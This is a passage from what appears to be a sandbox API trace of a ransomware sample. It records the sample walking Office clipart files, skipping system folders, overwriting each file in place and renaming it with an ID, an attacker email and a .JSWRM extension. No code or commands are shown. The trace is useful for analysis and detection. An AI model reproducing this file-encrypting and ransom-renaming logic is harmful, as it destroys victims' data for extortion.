CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0091.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0091.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0091.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0091.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0091.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.413] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00433_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00433_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00433_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00433_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0091.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0091.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0091.414] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf55e30d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf55e30d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf55e30d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f38, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00438_.WMF", cAlternateFileName="")) returned 1 [0091.414] lstrcmpiW (lpString1="NA00438_.WMF", lpString2=".") returned 1 [0091.414] lstrcmpiW (lpString1="NA00438_.WMF", lpString2="..") returned 1 [0091.414] lstrcmpiW (lpString1="NA00438_.WMF", lpString2="...") returned 1 [0091.414] lstrcmpiW (lpString1="NA00438_.WMF", lpString2="windows") returned -1 [0091.414] lstrcmpiW (lpString1="NA00438_.WMF", lpString2="recovery") returned -1 [0091.414] lstrcmpiW (lpString1="NA00438_.WMF", lpString2="perflogs") returned -1 [0091.414] lstrcmpiW (lpString1="NA00438_.WMF", lpString2="documents and settings") returned 1 [0091.414] lstrcmpiW (lpString1="NA00438_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.414] lstrcmpiW (lpString1="NA00438_.WMF", lpString2="system volume information") returned -1 [0091.414] lstrcmpiW (lpString1="NA00438_.WMF", lpString2="msocache") returned 1 [0091.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0091.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00438_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00438_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00438_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0091.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0091.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00438_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00438_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00438_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0091.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0091.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0091.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0091.415] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00438_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00438_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.415] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12088) returned 1 [0091.415] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2f30) returned 0x24d210 [0091.415] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2f30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2f30, lpOverlapped=0x0) returned 1 [0091.417] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.417] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2f30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2f30, lpOverlapped=0x0) returned 1 [0091.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.417] CloseHandle (hObject=0x314) returned 1 [0091.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0091.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0091.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0091.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0091.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0091.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0091.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0091.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0091.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0091.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0091.418] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00438_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00438_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00438_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00438_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0091.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0091.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0091.418] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf58455c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf58455c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf58455c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14bc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00452_.WMF", cAlternateFileName="")) returned 1 [0091.419] lstrcmpiW (lpString1="NA00452_.WMF", lpString2=".") returned 1 [0091.419] lstrcmpiW (lpString1="NA00452_.WMF", lpString2="..") returned 1 [0091.419] lstrcmpiW (lpString1="NA00452_.WMF", lpString2="...") returned 1 [0091.419] lstrcmpiW (lpString1="NA00452_.WMF", lpString2="windows") returned -1 [0091.419] lstrcmpiW (lpString1="NA00452_.WMF", lpString2="recovery") returned -1 [0091.419] lstrcmpiW (lpString1="NA00452_.WMF", lpString2="perflogs") returned -1 [0091.419] lstrcmpiW (lpString1="NA00452_.WMF", lpString2="documents and settings") returned 1 [0091.419] lstrcmpiW (lpString1="NA00452_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.419] lstrcmpiW (lpString1="NA00452_.WMF", lpString2="system volume information") returned -1 [0091.419] lstrcmpiW (lpString1="NA00452_.WMF", lpString2="msocache") returned 1 [0091.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0091.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00452_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00452_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00452_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0091.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0091.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00452_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00452_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00452_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0091.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0091.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0091.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0091.419] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00452_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00452_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.420] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5308) returned 1 [0091.420] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14b0) returned 0x205850 [0091.420] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x14b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x14b0, lpOverlapped=0x0) returned 1 [0091.428] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.428] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x14b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x14b0, lpOverlapped=0x0) returned 1 [0091.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0091.428] CloseHandle (hObject=0x314) returned 1 [0091.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0091.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0091.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0091.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0091.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0091.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0091.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0091.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0091.429] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00452_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00452_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00452_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00452_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0091.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0091.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0091.429] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf58455c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf58455c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf58455c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1580, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00454_.WMF", cAlternateFileName="")) returned 1 [0091.429] lstrcmpiW (lpString1="NA00454_.WMF", lpString2=".") returned 1 [0091.430] lstrcmpiW (lpString1="NA00454_.WMF", lpString2="..") returned 1 [0091.430] lstrcmpiW (lpString1="NA00454_.WMF", lpString2="...") returned 1 [0091.430] lstrcmpiW (lpString1="NA00454_.WMF", lpString2="windows") returned -1 [0091.430] lstrcmpiW (lpString1="NA00454_.WMF", lpString2="recovery") returned -1 [0091.430] lstrcmpiW (lpString1="NA00454_.WMF", lpString2="perflogs") returned -1 [0091.430] lstrcmpiW (lpString1="NA00454_.WMF", lpString2="documents and settings") returned 1 [0091.430] lstrcmpiW (lpString1="NA00454_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.430] lstrcmpiW (lpString1="NA00454_.WMF", lpString2="system volume information") returned -1 [0091.430] lstrcmpiW (lpString1="NA00454_.WMF", lpString2="msocache") returned 1 [0091.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0091.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00454_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00454_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00454_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0091.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0091.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00454_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00454_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00454_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0091.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0091.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0091.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0091.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00454_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00454_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.431] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5504) returned 1 [0091.431] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1580) returned 0x205850 [0091.431] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1580, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1580, lpOverlapped=0x0) returned 1 [0091.433] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.433] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1580, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1580, lpOverlapped=0x0) returned 1 [0091.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0091.433] CloseHandle (hObject=0x314) returned 1 [0091.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0091.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0091.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0091.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0091.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0091.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0091.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0091.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0091.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0091.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0091.434] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00454_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00454_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00454_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00454_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0091.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0091.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0091.435] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf58455c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf58455c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf58455c, 